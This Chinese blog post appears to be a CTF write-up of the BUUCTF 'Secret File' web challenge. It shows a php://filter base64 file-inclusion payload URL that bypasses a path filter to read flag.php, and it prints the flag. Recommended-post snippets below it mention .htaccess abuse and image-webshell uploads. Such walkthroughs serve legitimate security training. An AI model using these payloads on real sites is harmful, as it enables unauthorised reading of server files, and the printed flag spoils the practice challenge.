【BUUCTF刷题记录】Secret File1

最新推荐文章于 2024-05-13 22:33:34 发布
最新推荐文章于 2024-05-13 22:33:34 发布
阅读量280 收藏 1
点赞数
分类专栏: BUUCTF刷题 文章标签: html 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60911102/article/details/126911135
版权

1. 打开靶场,发现只有两行字,没有输入框或者搜索框之类的。右击检查,查看源码,发现一个超链接文件./Archive_room.php。

 直接点击进入到该页面:

 (有点强迫症,想找到oh,you found me!的超链接文字在哪,最简单的方法只要选中页面上的文字拉一下就能看到了,如下图)

2. 进入 /Archive_room.php文件后看到一个按钮,点击后跳到另一个页面。依然没有输入框,查看源码没有发现任何信息。

3. 使用burpsuite抓包。发现中间提交了一个action.php ,使用burpsuite重放一下,看到了ser3t.php文件。

4. 依然在bp的repeater模块中,将GET后面的参数该文/secr3t.php文件 ,点击GO访问。看到include,应该是文件包含之类的漏洞,并且代码中可以看到,../, tp, input, data被过滤了。根据这个提示,考虑使用PHP伪协议绕过过滤。

5. 构造参数,读取文件。

 php伪协议实际上就是php支持的协议和封装协议,一共包括12种。

详细的介绍以及在实际中的应用参考大佬文章:

PHP伪协议总结 - SegmentFault 思否

http://ed3d1a3c-0faa-4191-a5cc-381d80e67262.node4.buuoj.cn:81//secr3t.php?file=php://filter/convert.base64-encode/resource=flag.php

以上url成功输出经过base64编码后的信息:

解码后的信息为:

<!DOCTYPE html>

<html>

    <head>
        <meta charset="utf-8">
        <title>FLAG</title>
    </head>

    <body style="background-color:black;"><br><br><br><br><br><br>
        
        <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
        
        <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
            <?php
                echo "我就在这里";
                $flag = 'flag{025a36c4-45ea-4de3-8ec5-c1b359f06210}';
                $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
            ?>
        </p>
    </body>

</html>

 成功看到flag和secret。

ps. 这个秘密。。。好像好多人都有呢hhhhh

不会重名的昵称
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf web小结
qq_42551635的博客
04-25 4578
你传你*呢 .htaccess文件 AddType application/x-httpd-php xxx 本句话的作用是使该.htaccess文件所在目录及其子目录中的后缀为.xxx的文件被Apache当做php文件 一个傻逼错误 var/www/html 是网站根目录,也就等价于 http://55f19d33-bd47-48ac-9734-232c1632f237.node3.buuoj.cn 所以蚁剑里链接时不能重复输入 题解 上传.htaccess文件(注意绕过MIME) 然后上传图片马 ,o
secret_file
12-24
攻防世界pwn题,该题虽然最终解题脚本比较简单,但分析过程还是比较中肯的,适合新人一同学习。解题wp链接:https://blog.csdn.net/A951860555/article/details/111601870
【bugku CTF】POST、头等舱、网站被黑、alert、你必须让他停下、本地管理员、bp
m0_63563528的博客
02-01 1247
burpsuite抓包、爆破等模块的使用,hackbar的使用
BUUCTF——[极客大挑战 2019]Secret File 1
最新发布
jemus17的博客
05-13 165
这道题其实“很简单”,鹅鹅鹅,这道题其实刚看的时候我以为是扫目录之类就能出成绩的,后来发现,唉,还是太年轻了,鹅鹅鹅,其实这道题到最后还是代码审计,只不过出题人很狗,他创造了剧情的伪造,跟着剧情走。来吧展示,出代码了。是一个文件包含漏洞,用filter协议不会触发他的判断条件。抓包可以看到在action.php有个提示是secr3t.php,进去看看。解一下码的到刚才看不到的页面的源码,带flag。看一下源码(Ctrl+u),有个链接。得到一个base64码。
攻防_漏洞_文件包含_文件包含漏洞详解
redglare的博客
10-22 4047
文件包含漏洞详解
base解码_php://filter在一次CTF中base被过滤的利用
weixin_39565910的博客
11-27 863
0x00 简介在一次线下ctf中的web题有一道关于php://filter伪协议的利用0x01题目分析靶机环境http://192.168.1.151:88/flag.php 存放flag信息的http://192.168.1.151:88/index.php 注释中有include1.phpinclude1代码如下error_reporting(0); @$file = $_G...
记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)
weixin_40103894的博客
10-01 1570
【代码】记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)
file_secret.rar_secret
09-21
标题中的"file_secret.rar_secret"暗示了这是一个关于文件加密的压缩包,可能包含了源代码或工具,用于加密和解密文件,特别适合初学者学习和实践。这个压缩包的命名方式可能是为了强调其“秘密”属性,意味着它涉及...
设备维修记录_secret.doc
09-15
设备维修记录_secret.doc
Secret实验手册1
08-03
当运行`kubectl get secret`和`kubectl describe secret`命令时,我们可以看到Secret的元数据以及加密后的数据量,但不会显示明文内容,这样可以确保数据的安全性。特别要注意的是,默认的`service-account-token` ...
培训记录表_secret.doc
09-15
培训记录表_secret.doc
BUUCTF 文件中的秘密 1 + qr 1
weixin_50401030的博客
09-11 1739
1| 文件中的秘密 1 下载压缩包得到图片 打开图片属性flag就在里面了! flag{870c5a72806115cb5439345d8b014396} 2| qr 1 下载图片得到一个二维码 拿微信扫二维码就能得到flag了!!! 注意将Flag的F改成小写 flag{878865ce73370a4ce607d21ca01b5e59} ...
BUUCTF Misc wireshark1 & 文件中的秘密1 & LSB1 & zip伪加密1 & rar1 & 被嗅探的流量1 & qr1 & 镜子里面的世界1
网安小趴菜
11-26 1139
BUUCTF Misc wireshark1 & 文件中的秘密1 & LSB1 & zip伪加密1 & rar1 & 被嗅探的流量1 & qr1 & 镜子里面的世界1 wp
buuctf—[极客大挑战 2019]Secret File 1
weixin_52620919的博客
10-23 221
查看源码: 点进去: 没啥用 抓包一下第一个页面 放到重发器里改个头(不知道啥意思) 得到新的线索: 访问一下: 得到php代码 访问flag.php 但是找不到flag 这时候想到用 php://fileter伪协议构造playload php://fileter伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php 得到一串字符串 base64解码得到flag flag{55a4d363-f988-484d-9b9.
BUUCTF 秘密文件
m0_49025459的博客
05-23 1038
解压压缩包,然后分析数据流,追踪TCP流的时候发现了问题 这个流量包里指定是有一个压缩包,扔到kali里给他分离出来 但是压缩包解压需要密码,跑一下解密软件,解出密码:1903
buuctf-SecretFile
xixihahawuwu的博客
11-23 719
查看下源码 访问过去 直接点击secret按钮 回去看看源码 又有一个 访问后自动跳转为end.php 本来以为是有别的按键存在或者源码的颜色问题,回去调了下页面颜色 结果什么都没有 结果抱着侥幸的心里返回首页查看 我的天,改了下颜色,然后用鼠标随便一拉!!! 发现了一个不一样的地方 改了下这个小框的颜色,一开始太激动没注意到,结果仔细一看… 这不就是我之前直接过去的php吗… 果然,点击之后,跳转到我们之前的界面 但是想着这个思路,试试这个界面是不是也有这样的 结果也只是证实了之..
BUUCTF-随便注、Exec、EasySQL、Secret File
m0_62905261的博客
06-13 775
目录[强网杯 2019]随便注[ACTF2020 新生赛]Exec[SUCTF 2019]EasySQL[极客大挑战 2019]Secret File打开场景,里面有输入框,上面自带一个1,点击提交,有回显输入1 ' or '1'='1 有回显,因该是字符型猜测是sql注入,查询字段数,输入1' order by 1 #当查询到第三个字段的时候,回显异常,说明只有两个字段输入1' union select 1,2 # 回显一个正则过滤规则过滤了很多的东西 查询数据库,输入1'; show databa
[极客大挑战 2019]Secret File(BUUCTF)
HackerYY的博客
12-30 1080
BUUCTF找秘密水题 内附解题过程
BUUCTF Web [极客大挑战 2019]Secret File
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [极客大挑战 2019]Secret File一、题目简介二、思路分析1)信息泄露2)文件包含三、解题步骤1)查看网页源代码2)拦截请求,查看响应信息3)文件包含漏洞4)PHP伪协议读取文件内容四、总结 一、题目简介 进入链接以后是一个「文字」页面,没有什么特别的功能 二、思路.
[极客大挑战 2019]Secret File 1
08-07
根据引用,这段脚本通过$_GET超全局变量接收一个文件名作为参数,并检查文件名是否包含特定的字符串。如果包含,则脚本会输出"Oh no!"并退出,以防止目录遍历攻击和恶意文件包含攻击。该脚本提供了一种安全措施来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值